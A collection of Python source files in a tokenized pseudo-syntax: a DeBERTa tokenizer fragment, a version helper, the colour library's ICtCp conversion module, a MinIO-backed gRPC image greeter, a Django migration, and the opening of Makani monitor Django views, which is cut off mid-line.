Optional second list of IDs for sequence pairs. already_has_special_tokens (`bool`, *optional*, defaults to `False`): Whether or not the token list is already formatted with special tokens for the model. Returns: `List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token. """<if_stmt>already_has_special_tokens<block_start><return>super().get_special_tokens_mask(token_ids_0=token_ids_0 token_ids_1=token_ids_1 already_has_special_tokens=<true>)<block_end><if_stmt>token_ids_1<is><not><none><block_start><return>[1]+([0]<times>len(token_ids_0))+[1]+([0]<times>len(token_ids_1))+[1]<block_end><return>[1]+([0]<times>len(token_ids_0))+[1]<block_end><def_stmt>create_token_type_ids_from_sequences self token_ids_0 token_ids_1=<none><block_start>""" Create a mask from the two sequences passed to be used in a sequence-pair classification task. A DeBERTa sequence pair mask has the following format: ``` 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 | first sequence | second sequence | ``` If `token_ids_1` is `None`, this method only returns the first portion of the mask (0s). Args: token_ids_0 (`List[int]`): List of IDs. token_ids_1 (`List[int]`, *optional*): Optional second list of IDs for sequence pairs. Returns: `List[int]`: List of [token type IDs](../glossary#token-type-ids) according to the given sequence(s). """<line_sep>sep=[self.sep_token_id]<line_sep>cls=[self.cls_token_id]<if_stmt>token_ids_1<is><none><block_start><return>len(cls+token_ids_0+sep)<times>[0]<block_end><return>len(cls+token_ids_0+sep)<times>[0]+len(token_ids_1+sep)<times>[1]<block_end><def_stmt>save_vocabulary self save_directory:str filename_prefix:Optional[str]=<none><arrow>Tuple[str]<block_start><if_stmt><not>self.can_save_slow_tokenizer<block_start><raise>ValueError("Your fast tokenizer does not have the necessary information to save the vocabulary for a slow "<concat>"tokenizer.")<block_end><if_stmt><not>os.path.isdir(save_directory)<block_start>logger.error(f"Vocabulary path ({save_directory}) should be a directory")<line_sep><return><block_end>out_vocab_file=os.path.join(save_directory (filename_prefix+"-"<if>filename_prefix<else>"")+VOCAB_FILES_NAMES["vocab_file"])<if_stmt>os.path.abspath(self.vocab_file)<ne>os.path.abspath(out_vocab_file)<block_start>copyfile(self.vocab_file out_vocab_file)<block_end><return>(out_vocab_file )<block_end><block_end>
"""Version utilities."""<import_from_future_stmt> annotations<import_stmt>packaging.version<class_stmt>Version(packaging.version.Version)<block_start>"""Customize packagining.version.Version."""<def_stmt>__init__ self version:str<arrow><none><block_start>"""Instantiate class. Args: version: Version string. (e.g. 1.0.0, v1.0.0) """<line_sep>self._original_text=version<line_sep>super().__init__(version)<block_end><def_stmt>__repr__ self<arrow>str<block_start>"""Return repr."""<line_sep># this usage of super is required to reproduce the intended result in # any subclasses of this class # pylint: disable=super-with-arguments <return>f"<Version('{super(Version self).__str__()}')>"<block_end><def_stmt>__str__ self<arrow>str<block_start>"""Return the original version string."""<line_sep><return>self._original_text<block_end><block_end>
# -*- coding: utf-8 -*- """ :math:`IC_TC_P` Colour Encoding =============================== Defines the :math:`IC_TC_P` colour encoding related transformations: - :func:`colour.RGB_to_ICtCp` - :func:`colour.ICtCp_to_RGB` - :func:`colour.XYZ_to_ICtCp` - :func:`colour.ICtCp_to_XYZ` References ---------- - :cite:`Dolby2016a` : Dolby. (2016). WHAT IS ICtCp? - INTRODUCTION. https://www.dolby.com/us/en/technologies/dolby-vision/ICtCp-white-paper.pdf - :cite:`InternationalTelecommunicationUnion2018` : International Telecommunication Union. (2018). Recommendation ITU-R BT.2100-2 - Image parameter values for high dynamic range television for use in production and international programme exchange. https://www.itu.int/dms_pubrec/itu-r/rec/bt/\ R-REC-BT.2100-2-201807-I!!PDF-E.pdf - :cite:`Lu2016c` : <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., Pytlarz, J., <NAME>., <NAME>., & <NAME>. (2016). ITP Colour Space and Its Compression Performance for High Dynamic Range and Wide Colour Gamut Video Distribution. ZTE Communications, 14(1), 32-38. """<import_stmt>numpy<as>np<import_from_stmt>colour.algebra vector_dot<import_from_stmt>colour.colorimetry CCS_ILLUMINANTS<import_from_stmt>colour.models.rgb RGB_COLOURSPACES RGB_to_XYZ XYZ_to_RGB<import_from_stmt>colour.models.rgb.transfer_functions eotf_ST2084 eotf_inverse_ST2084 oetf_HLG_BT2100 oetf_inverse_HLG_BT2100 <import_from_stmt>colour.utilities domain_range_scale from_range_1 to_domain_1 validate_method <line_sep>__author__='Colour Developers'<line_sep>__copyright__='Copyright (C) 2013-2021 - Colour Developers'<line_sep>__license__='New BSD License - https://opensource.org/licenses/BSD-3-Clause'<line_sep>__maintainer__='Colour Developers'<line_sep>__email__='<EMAIL>'<line_sep>__status__='Production'<line_sep>__all__=['MATRIX_ICTCP_RGB_TO_LMS' 'MATRIX_ICTCP_LMS_TO_RGB' 'MATRIX_ICTCP_LMS_P_TO_ICTCP' 'MATRIX_ICTCP_ICTCP_TO_LMS_P' 'MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2' 'MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2' 'RGB_to_ICtCp' 'ICtCp_to_RGB' 'XYZ_to_ICtCp' 'ICtCp_to_XYZ']<line_sep>MATRIX_ICTCP_RGB_TO_LMS=np.array([[1688 2146 262] [683 2951 462] [99 309 3688] ])/4096<line_sep>""" *ITU-R BT.2020* colourspace to normalised cone responses matrix. MATRIX_ICTCP_RGB_TO_LMS : array_like, (3, 3) """<line_sep>MATRIX_ICTCP_LMS_TO_RGB=np.linalg.inv(MATRIX_ICTCP_RGB_TO_LMS)<line_sep>""" :math:`IC_TC_P` colourspace normalised cone responses to *ITU-R BT.2020* colourspace matrix. MATRIX_ICTCP_LMS_TO_RGB : array_like, (3, 3) """<line_sep>MATRIX_ICTCP_LMS_P_TO_ICTCP=np.array([[2048 2048 0] [6610 -13613 7003] [17933 -17390 -543] ])/4096<line_sep>""" :math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses to :math:`IC_TC_P` colour encoding matrix. MATRIX_ICTCP_LMS_P_TO_ICTCP : array_like, (3, 3) """<line_sep>MATRIX_ICTCP_ICTCP_TO_LMS_P=np.linalg.inv(MATRIX_ICTCP_LMS_P_TO_ICTCP)<line_sep>""" :math:`IC_TC_P` colour encoding to :math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses matrix. MATRIX_ICTCP_ICTCP_TO_LMS_P : array_like, (3, 3) """<line_sep>MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2=np.array([[2048 2048 0] [3625 -7465 3840] [9500 -9212 -288] ])/4096<line_sep>""" :math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses to :math:`IC_TC_P` colour encoding matrix as given in *ITU-R BT.2100-2*. MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2 : array_like, (3, 3) """<line_sep>MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2=np.linalg.inv(MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2)<line_sep>""" :math:`IC_TC_P` colour encoding to :math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses matrix as given in *ITU-R BT.2100-2*. MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2 : array_like, (3, 3) """<def_stmt>RGB_to_ICtCp RGB method='Dolby 2016' L_p=10000<block_start>""" Converts from *ITU-R BT.2020* colourspace to :math:`IC_TC_P` colour encoding. Parameters ---------- RGB : array_like *ITU-R BT.2020* colourspace array. method : unicode, optional **{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ', 'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**, Computation method. *Recommendation ITU-R BT.2100* defines multiple variants of the :math:`IC_TC_P` colour encoding: - *ITU-R BT.2100-1* - *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*, *ITU-R BT.2100-2 PQ* methods. - *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method. - *ITU-R BT.2100-2* - *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*, *ITU-R BT.2100-2 PQ* methods. - *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical transfer function (OETF / OECF) and a custom :math:`IC_TC_P` matrix from :cite:`InternationalTelecommunicationUnion2018`: *ITU-R BT.2100-2 HLG* method. L_p : numeric, optional Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014* non-linear encoding. This parameter should stay at its default :math:`10000 cd/m^2` value for practical applications. It is exposed so that the definition can be used as a fitting function. Returns ------- ndarray :math:`IC_TC_P` colour encoding array. Warnings -------- The underlying *SMPTE ST 2084:2014* transfer function is an absolute transfer function. Notes ----- - The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases for the *Dolby 2016* method. - The underlying *SMPTE ST 2084:2014* transfer function is an absolute transfer function, thus the domain and range values for the *Reference* and *1* scales are only indicative that the data is not affected by scale transformations. The effective domain of *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) is [0.0001, 10000]. +------------+-----------------------+------------------+ | **Domain** | **Scale - Reference** | **Scale - 1** | +============+=======================+==================+ | ``RGB`` | ``UN`` | ``UN`` | +------------+-----------------------+------------------+ +------------+-----------------------+------------------+ | **Range** | **Scale - Reference** | **Scale - 1** | +============+=======================+==================+ | ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] | | | | | | | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] | | | | | | | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] | +------------+-----------------------+------------------+ References ---------- :cite:`Dolby2016a`, :cite:`Lu2016c` Examples -------- >>> RGB = np.array([0.45620519, 0.03081071, 0.04091952]) >>> RGB_to_ICtCp(RGB) # doctest: +ELLIPSIS array([ 0.0735136..., 0.0047525..., 0.0935159...]) >>> RGB_to_ICtCp(RGB, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS array([ 0.6256789..., -0.0198449..., 0.3591125...]) """<line_sep>RGB=to_domain_1(RGB)<line_sep>method=validate_method(method ['Dolby 2016' 'ITU-R BT.2100-1 HLG' 'ITU-R BT.2100-1 PQ' 'ITU-R BT.2100-2 HLG' 'ITU-R BT.2100-2 PQ'])<line_sep>is_hlg_method='hlg'<in>method<line_sep>is_BT2100_2_method='2100-2'<in>method<line_sep>LMS=vector_dot(MATRIX_ICTCP_RGB_TO_LMS RGB)<with_stmt>domain_range_scale('ignore')<block_start>LMS_p=(oetf_HLG_BT2100(LMS)<if>is_hlg_method<else>eotf_inverse_ST2084(LMS L_p))<block_end>ICtCp=(vector_dot(MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2 LMS_p)<if>(is_hlg_method<and>is_BT2100_2_method)<else>vector_dot(MATRIX_ICTCP_LMS_P_TO_ICTCP LMS_p))<line_sep><return>from_range_1(ICtCp)<block_end><def_stmt>ICtCp_to_RGB ICtCp method='Dolby 2016' L_p=10000<block_start>""" Converts from :math:`IC_TC_P` colour encoding to *ITU-R BT.2020* colourspace. Parameters ---------- ICtCp : array_like :math:`IC_TC_P` colour encoding array. method : unicode, optional **{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ', 'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**, Computation method. *Recommendation ITU-R BT.2100* defines multiple variants of the :math:`IC_TC_P` colour encoding: - *ITU-R BT.2100-1* - *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*, *ITU-R BT.2100-2 PQ* methods. - *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method. - *ITU-R BT.2100-2* - *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*, *ITU-R BT.2100-2 PQ* methods. - *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical transfer function (OETF / OECF) and a custom :math:`IC_TC_P` matrix from :cite:`InternationalTelecommunicationUnion2018`: *ITU-R BT.2100-2 HLG* method. L_p : numeric, optional Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014* non-linear encoding. This parameter should stay at its default :math:`10000 cd/m^2` value for practical applications. It is exposed so that the definition can be used as a fitting function. Returns ------- ndarray *ITU-R BT.2020* colourspace array. Warnings -------- The underlying *SMPTE ST 2084:2014* transfer function is an absolute transfer function. Notes ----- - The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases for the *Dolby 2016* method. - The underlying *SMPTE ST 2084:2014* transfer function is an absolute transfer function, thus the domain and range values for the *Reference* and *1* scales are only indicative that the data is not affected by scale transformations. +------------+-----------------------+------------------+ | **Domain** | **Scale - Reference** | **Scale - 1** | +============+=======================+==================+ | ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] | | | | | | | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] | | | | | | | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] | +------------+-----------------------+------------------+ +------------+-----------------------+------------------+ | **Range** | **Scale - Reference** | **Scale - 1** | +============+=======================+==================+ | ``RGB`` | ``UN`` | ``UN`` | +------------+-----------------------+------------------+ References ---------- :cite:`Dolby2016a`, :cite:`Lu2016c` Examples -------- >>> ICtCp = np.array([0.07351364, 0.00475253, 0.09351596]) >>> ICtCp_to_RGB(ICtCp) # doctest: +ELLIPSIS array([ 0.4562052..., 0.0308107..., 0.0409195...]) >>> ICtCp = np.array([0.62567899, -0.01984490, 0.35911259]) >>> ICtCp_to_RGB(ICtCp, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS array([ 0.4562052..., 0.0308107..., 0.0409195...]) """<line_sep>ICtCp=to_domain_1(ICtCp)<line_sep>method=validate_method(method ['Dolby 2016' 'ITU-R BT.2100-1 HLG' 'ITU-R BT.2100-1 PQ' 'ITU-R BT.2100-2 HLG' 'ITU-R BT.2100-2 PQ'])<line_sep>is_hlg_method='hlg'<in>method<line_sep>is_BT2100_2_method='2100-2'<in>method<line_sep>LMS_p=(vector_dot(MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2 ICtCp)<if>(is_hlg_method<and>is_BT2100_2_method)<else>vector_dot(MATRIX_ICTCP_ICTCP_TO_LMS_P ICtCp))<with_stmt>domain_range_scale('ignore')<block_start>LMS=(oetf_inverse_HLG_BT2100(LMS_p)<if>is_hlg_method<else>eotf_ST2084(LMS_p L_p))<block_end>RGB=vector_dot(MATRIX_ICTCP_LMS_TO_RGB LMS)<line_sep><return>from_range_1(RGB)<block_end><def_stmt>XYZ_to_ICtCp XYZ illuminant=CCS_ILLUMINANTS['CIE 1931 2 Degree Standard Observer']['D65'] chromatic_adaptation_transform='CAT02' method='Dolby 2016' L_p=10000<block_start>""" Converts from *CIE XYZ* tristimulus values to :math:`IC_TC_P` colour encoding. Parameters ---------- XYZ : array_like *CIE XYZ* tristimulus values. illuminant : array_like, optional Source illuminant chromaticity coordinates. chromatic_adaptation_transform : unicode, optional **{'CAT02', 'XYZ Scaling', '<NAME>', 'Bradford', 'Sharp', 'Fairchild', 'CMCCAT97', 'CMCCAT2000', 'CAT02 Brill 2008', 'CAT16', 'Bianco 2010', 'Bianco PC 2010'}**, *Chromatic adaptation* transform. method : unicode, optional **{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ', 'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**, Computation method. *Recommendation ITU-R BT.2100* defines multiple variants of the :math:`IC_TC_P` colour encoding: - *ITU-R BT.2100-1* - *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*, *ITU-R BT.2100-2 PQ* methods. - *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method. - *ITU-R BT.2100-2* - *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*, *ITU-R BT.2100-2 PQ* methods. - *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical transfer function (OETF / OECF) and a custom :math:`IC_TC_P` matrix from :cite:`InternationalTelecommunicationUnion2018`: *ITU-R BT.2100-2 HLG* method. L_p : numeric, optional Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014* non-linear encoding. This parameter should stay at its default :math:`10000 cd/m^2` value for practical applications. It is exposed so that the definition can be used as a fitting function. Returns ------- ndarray :math:`IC_TC_P` colour encoding array. Warnings -------- The underlying *SMPTE ST 2084:2014* transfer function is an absolute transfer function. Notes ----- - The underlying *SMPTE ST 2084:2014* transfer function is an absolute transfer function, thus the domain and range values for the *Reference* - The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases for the *Dolby 2016* method. and *1* scales are only indicative that the data is not affected by scale transformations. The effective domain of *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) is [0.0001, 10000]. +------------+-----------------------+------------------+ | **Domain** | **Scale - Reference** | **Scale - 1** | +============+=======================+==================+ | ``XYZ`` | ``UN`` | ``UN`` | +------------+-----------------------+------------------+ +------------+-----------------------+------------------+ | **Range** | **Scale - Reference** | **Scale - 1** | +============+=======================+==================+ | ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] | | | | | | | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] | | | | | | | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] | +------------+-----------------------+------------------+ References ---------- :cite:`Dolby2016a`, :cite:`Lu2016c` Examples -------- >>> XYZ = np.array([0.20654008, 0.12197225, 0.05136952]) >>> XYZ_to_ICtCp(XYZ) # doctest: +ELLIPSIS array([ 0.0685809..., -0.0028384..., 0.0602098...]) >>> XYZ_to_ICtCp(XYZ, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS array([ 0.5924279..., -0.0374073..., 0.2512267...]) """<line_sep>BT2020=RGB_COLOURSPACES['ITU-R BT.2020']<line_sep>RGB=XYZ_to_RGB(XYZ illuminant BT2020.whitepoint BT2020.matrix_XYZ_to_RGB chromatic_adaptation_transform )<line_sep><return>RGB_to_ICtCp(RGB method L_p)<block_end><def_stmt>ICtCp_to_XYZ ICtCp illuminant=CCS_ILLUMINANTS['CIE 1931 2 Degree Standard Observer']['D65'] chromatic_adaptation_transform='CAT02' method='Dolby 2016' L_p=10000<block_start>""" Converts from :math:`IC_TC_P` colour encoding to *CIE XYZ* tristimulus values. Parameters ---------- ICtCp : array_like :math:`IC_TC_P` colour encoding array. illuminant : array_like, optional Source illuminant chromaticity coordinates. chromatic_adaptation_transform : unicode, optional **{'CAT02', 'XYZ Scaling', '<NAME>', 'Bradford', 'Sharp', 'Fairchild', 'CMCCAT97', 'CMCCAT2000', 'CAT02 Brill 2008', 'CAT16', 'Bianco 2010', 'Bianco PC 2010'}**, *Chromatic adaptation* transform. method : unicode, optional **{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ', 'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**, Computation method. *Recommendation ITU-R BT.2100* defines multiple variants of the :math:`IC_TC_P` colour encoding: - *ITU-R BT.2100-1* - *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*, *ITU-R BT.2100-2 PQ* methods. - *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method. - *ITU-R BT.2100-2* - *SMPTE ST 2084:2014* inverse electro-optical transfer function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*, *ITU-R BT.2100-2 PQ* methods. - *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical transfer function (OETF / OECF) and a custom :math:`IC_TC_P` matrix from :cite:`InternationalTelecommunicationUnion2018`: *ITU-R BT.2100-2 HLG* method. L_p : numeric, optional Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014* non-linear encoding. This parameter should stay at its default :math:`10000 cd/m^2` value for practical applications. It is exposed so that the definition can be used as a fitting function. Returns ------- ndarray *CIE XYZ* tristimulus values. Warnings -------- The underlying *SMPTE ST 2084:2014* transfer function is an absolute transfer function. Notes ----- - The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases for the *Dolby 2016* method. - The underlying *SMPTE ST 2084:2014* transfer function is an absolute transfer function, thus the domain and range values for the *Reference* and *1* scales are only indicative that the data is not affected by scale transformations. +------------+-----------------------+------------------+ | **Domain** | **Scale - Reference** | **Scale - 1** | +============+=======================+==================+ | ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] | | | | | | | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] | | | | | | | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] | +------------+-----------------------+------------------+ +------------+-----------------------+------------------+ | **Range** | **Scale - Reference** | **Scale - 1** | +============+=======================+==================+ | ``XYZ`` | ``UN`` | ``UN`` | +------------+-----------------------+------------------+ References ---------- :cite:`Dolby2016a`, :cite:`Lu2016c` Examples -------- >>> ICtCp = np.array([0.06858097, -0.00283842, 0.06020983]) >>> ICtCp_to_XYZ(ICtCp) # doctest: +ELLIPSIS array([ 0.2065400..., 0.1219722..., 0.0513695...]) >>> ICtCp = np.array([0.59242792, -0.03740730, 0.25122675]) >>> ICtCp_to_XYZ(ICtCp, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS array([ 0.2065400..., 0.1219722..., 0.0513695...]) """<line_sep>RGB=ICtCp_to_RGB(ICtCp method L_p)<line_sep>BT2020=RGB_COLOURSPACES['ITU-R BT.2020']<line_sep>XYZ=RGB_to_XYZ(RGB BT2020.whitepoint illuminant BT2020.matrix_RGB_to_XYZ chromatic_adaptation_transform )<line_sep><return>XYZ<block_end>
<import_from_stmt>concurrent futures<import_stmt>logging<import_stmt>os<import_stmt>grpc<import_from_stmt>PIL Image ImageOps<import_stmt>helloworld_pb2<import_stmt>helloworld_pb2_grpc<import_from_stmt>minio Minio<line_sep>minioEnvKey="MINIO_ADDRESS"<line_sep>image_name='img2.jpeg'<line_sep>image2_name='img3.jpeg'<line_sep>image_path='/pulled_'+image_name<line_sep>image_path2='/pulled_'+image2_name<line_sep>responses=["record_response" "replay_response"]<line_sep>minioAddress=os.getenv(minioEnvKey)<class_stmt>Greeter(helloworld_pb2_grpc.GreeterServicer)<block_start><def_stmt>SayHello self request context<block_start><if_stmt>minioAddress<eq><none><block_start><return><none><block_end>minioClient=Minio(minioAddress access_key='minioadmin' secret_key='minioadmin' secure=<false>)<if_stmt>request.name<eq>"record"<block_start>msg='Hello, %s!'%responses[0]<line_sep>minioClient.fget_object('mybucket' image_name image_path)<line_sep>image=Image.open(image_path)<line_sep>img=image.transpose(Image.ROTATE_90)<block_end><elif_stmt>request.name<eq>"replay"<block_start>msg='Hello, %s!'%responses[1]<line_sep>minioClient.fget_object('mybucket' image2_name image_path2)<line_sep>image2=Image.open(image_path2)<line_sep>img=image2.transpose(Image.ROTATE_90)<block_end><else_stmt><block_start>msg='Hello, %s!'%request.name<line_sep>minioClient.fget_object('mybucket' image_name image_path)<line_sep>image=Image.open(image_path)<line_sep>img=image.transpose(Image.ROTATE_90)<block_end><return>helloworld_pb2.HelloReply(message=msg)<block_end><block_end><def_stmt>serve <block_start>server=grpc.server(futures.ThreadPoolExecutor(max_workers=1))<line_sep>helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter() server)<line_sep>server.add_insecure_port('[::]:50051')<line_sep>server.start()<line_sep>server.wait_for_termination()<block_end><if_stmt>__name__<eq>'__main__'<block_start>logging.basicConfig()<line_sep>serve()<block_end>
# Generated by Django 1.11.20 on 2019-06-12 06:41 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("zerver" "0229_stream_message_retention_days") ]<line_sep>operations=[migrations.RenameField(model_name="userprofile" old_name="enable_stream_sounds" new_name="enable_stream_audible_notifications" ) ]<block_end>
# Copyright 2020 Makani Technologies LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """View functions to interact with web clients."""<import_stmt>atexit<import_stmt>json<import_stmt>logging<import_stmt>os<import_stmt>re<import_stmt>string<import_stmt>time<import_from_stmt>django http<import_from_stmt>django shortcuts<import_from_stmt>django template<import_from_stmt>django.core urlresolvers<import_from_stmt>makani.analysis.checks log_util<import_from_stmt>makani.avionics.network message_type<as>aio_message_type<import_from_stmt>makani.avionics.network network_config<import_from_stmt>makani.gs.monitor2.apps.layout autogen<import_from_stmt>makani.gs.monitor2.apps.layout base<as>layout_base<import_from_stmt>makani.gs.monitor2.apps.layout layout_util<import_from_stmt>makani.gs.monitor2.apps.layout loader<import_from_stmt>makani.gs.monitor2.apps.layout memory<as>layout_memory<import_from_stmt>makani.gs.monitor2.apps.layout stoplights<import_from_stmt>makani.gs.monitor2.apps.layout widgets<import_from_stmt>makani.gs.monitor2.apps.receiver receiver_manager<import_from_stmt>makani.gs.monitor2.apps.receiver views<as>receiver_views<import_from_stmt>makani.gs.monitor2.project settings<import_from_stmt>makani.lib.bazel bazel_util<import_from_stmt>makani.lib.python c_helpers<import_from_stmt>makani.lib.python debug_util<import_from_stmt>makani.lib.python struct_tree<import_from_stmt>makani.lib.python.h5_utils h5_io<import_stmt>numpy<line_sep>MESSAGE_TYPE_HELPER=c_helpers.EnumHelper('MessageType' aio_message_type)<line_sep>CONFIG_FILES={'plot_defs':os.path.join(settings.MONITOR_PATH 'configs/plot_defs.json') }<def_stmt>Home request<block_start>"""Get the response for the home page."""<line_sep>layout_names=loader.LayoutLoader().Names()<line_sep>layout_names.sort()<line_sep>all_layouts=[{'name':layout 'url':urlresolvers.reverse('view_aio_layout' args=[loader.LayoutLoader().ModuleName(layout)])}<for>layout layout_names]<line_sep>context={'layouts':all_layouts 'canvas_cols':settings.CSS_GRID_COLUMNS }<line_sep>_CreateAndAddClientIdToContext(context)<line_sep>template_name='home.html'<line_sep><return>shortcuts.render(request template_name context context_instance=template.RequestContext(request))<block_end><def_stmt>_ListFiles path_arg<block_start>"""List files under a local path."""<line_sep>path_template=string.Template(path_arg)<line_sep>prefix_path=path_template.substitute(os.environ)<line_sep>sub_paths=os.listdir(prefix_path)<line_sep><return>prefix_path sub_paths<block_end><def_stmt>_GetFullFilePath prefix_path sub_path<block_start><return>os.path.join(prefix_path sub_path)<block_end><def_stmt>SelectAllLogs request<block_start>"""Select all logs in the last visited directory."""<line_sep>current_path=request.session['current_path']<try_stmt><block_start>prefix_path,sub_paths=_ListFiles(current_path)<block_end><except_stmt>OSError<block_start><return>http.HttpResponse('Cannot list directory "%s"!'%current_path)<block_end>file_list=[]<for_stmt>sub_path sorted(sub_paths)# Construct the full path. <block_start><if_stmt>sub_path.endswith('.h5')<and><not>sub_path.startswith('format')<block_start>full_path=_GetFullFilePath(prefix_path sub_path)<if_stmt><not>os.path.isdir(full_path)<block_start>file_list.append(full_path)<block_end><block_end><block_end><return>http.HttpResponse(';\n'.join(file_list))<block_end><def_stmt>Console request command args<block_start>"""Take commandlines from the client and respond with console outputs. Args: request: The HTML resquest object. command: The command to be run. Only 'ls' is permitted for now. args: The string of arguments to the command. Returns: The HttpResponse telling the output of the command. """<if_stmt>command<ne>'ls'<block_start>message='Command "%s" is not allowed.'%command<line_sep><return>http.HttpResponse(message)<block_end>arg_template=string.Template(args)<line_sep>arg_path=arg_template.safe_substitute({'MAKANI_HOME':bazel_util.GetWorkspaceRoot()})<try_stmt><block_start>prefix_path,sub_paths=_ListFiles(arg_path)<line_sep>request.session['current_path']=arg_path<block_end><except_stmt>OSError<block_start><return>http.HttpResponse('Cannot list directory "%s"!'%arg_path)<block_end>file_list=[]<for_stmt>sub_path sorted(sub_paths)# Construct the full path. <block_start>full_path=_GetFullFilePath(prefix_path sub_path)<if_stmt>os.path.isdir(full_path)# If this is a directory, add the javascript to allow users to click # into it. <block_start>file_list.append('<a href="javascript:void(0)" onclick="onListFiles(\'%s\')">%s</a>'%(full_path sub_path))<block_end><elif_stmt>sub_path.endswith('.h5')<and><not>sub_path.startswith('format')# If this is an HDF5 file, add the javascript to allow users to # visualize it. <block_start>file_list.append('<a href="javascript:void(0)" onclick="onAddLog(\'%s\')">%s</a>'%(full_path 